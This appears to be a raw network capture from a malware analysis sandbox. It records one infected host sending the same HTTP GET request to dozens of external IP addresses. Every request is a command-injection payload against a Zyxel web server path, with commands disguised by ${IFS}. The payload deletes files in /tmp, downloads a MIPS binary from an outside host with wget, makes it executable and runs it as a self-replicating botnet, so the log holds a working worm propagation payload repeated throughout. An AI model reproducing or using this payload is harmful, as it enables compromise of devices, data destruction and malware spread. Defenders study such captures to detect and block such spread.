                              Mar 31, 2024 08:41:46.086167097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6570192.168.2.135407476.159.146.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086185932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6571192.168.2.135572276.55.244.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086230993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6572192.168.2.134007839.110.78.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086266994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6573192.168.2.1359930102.242.198.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086308956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6574192.168.2.1358946154.206.254.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086370945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6575192.168.2.135208827.138.171.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086399078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6576192.168.2.1340182182.249.251.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086424112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6577192.168.2.135277062.8.229.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086481094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6578192.168.2.1333020104.107.155.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086533070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6579192.168.2.1340578187.254.73.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086555004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6580192.168.2.133441277.174.73.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086600065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6581192.168.2.1334956146.184.148.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086622953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6582192.168.2.135702035.136.194.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086678028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6583192.168.2.1360090135.15.100.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086714029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6584192.168.2.1343108173.169.201.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086744070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6585192.168.2.1341644222.65.187.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086781025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6586192.168.2.1335588165.40.4.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086824894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6587192.168.2.1351238222.77.167.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086874008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6588192.168.2.135591645.62.119.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086916924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6589192.168.2.133913812.152.177.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086955070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6590192.168.2.13530664.41.125.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086999893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6591192.168.2.1344274202.180.73.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087057114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6592192.168.2.133812841.133.26.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087109089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6593192.168.2.133514471.203.36.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087122917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6594192.168.2.134054879.73.215.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087146997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6595192.168.2.1340458165.222.190.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087188005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6596192.168.2.1336976115.1.98.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087219954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6597192.168.2.1346636115.10.17.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087265015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6598192.168.2.1347286136.55.109.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087301016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6599192.168.2.133665053.86.234.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087337017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6600192.168.2.135460857.35.36.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087383032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6601192.168.2.134362080.46.199.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087409019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6602192.168.2.1354178126.26.221.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087472916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6603192.168.2.135414071.248.159.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087487936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6604192.168.2.1348748115.57.123.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087546110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6605192.168.2.1338110142.6.213.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087583065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6606192.168.2.1345438196.162.247.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087635040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6607192.168.2.1339262180.133.248.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087687016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6608192.168.2.135787461.20.183.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087717056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6609192.168.2.13411628.88.35.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087769032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6610192.168.2.1339004157.225.33.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087812901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6611192.168.2.1354738108.155.87.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087862968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6612192.168.2.1356812153.34.77.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087892056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6613192.168.2.133660096.123.162.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087928057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6614192.168.2.134402291.213.98.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.087973118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6615192.168.2.1359118188.203.67.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088015079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6616192.168.2.1352684151.101.28.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088051081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6617192.168.2.134845888.203.51.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088098049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6618192.168.2.1357066179.186.90.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088146925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6619192.168.2.1344606117.202.47.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088186979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6620192.168.2.1334808130.141.80.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088206053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6621192.168.2.133367667.191.183.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088268995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6622192.168.2.1351968219.253.218.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088390112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6623192.168.2.1360840110.90.92.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088397980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6624192.168.2.1342966113.52.73.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088421106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6625192.168.2.1344570103.123.39.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088447094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6626192.168.2.133610287.236.148.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088516951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6627192.168.2.1349018213.109.145.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088560104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6628192.168.2.1347590192.182.205.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088594913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6629192.168.2.1347430166.16.59.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088646889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6630192.168.2.1346834159.33.5.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088668108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6631192.168.2.1334648147.179.159.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088690042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6632192.168.2.1348832137.197.206.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088727951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6633192.168.2.135519871.56.120.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088754892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6634192.168.2.135788659.233.179.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088793993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6635192.168.2.1336972189.147.219.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088814020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6636192.168.2.134959653.68.234.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088856936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6637192.168.2.13536288.103.190.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088895082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6638192.168.2.1350110217.87.162.249443
                              TimestampBytes transferredDirectionData
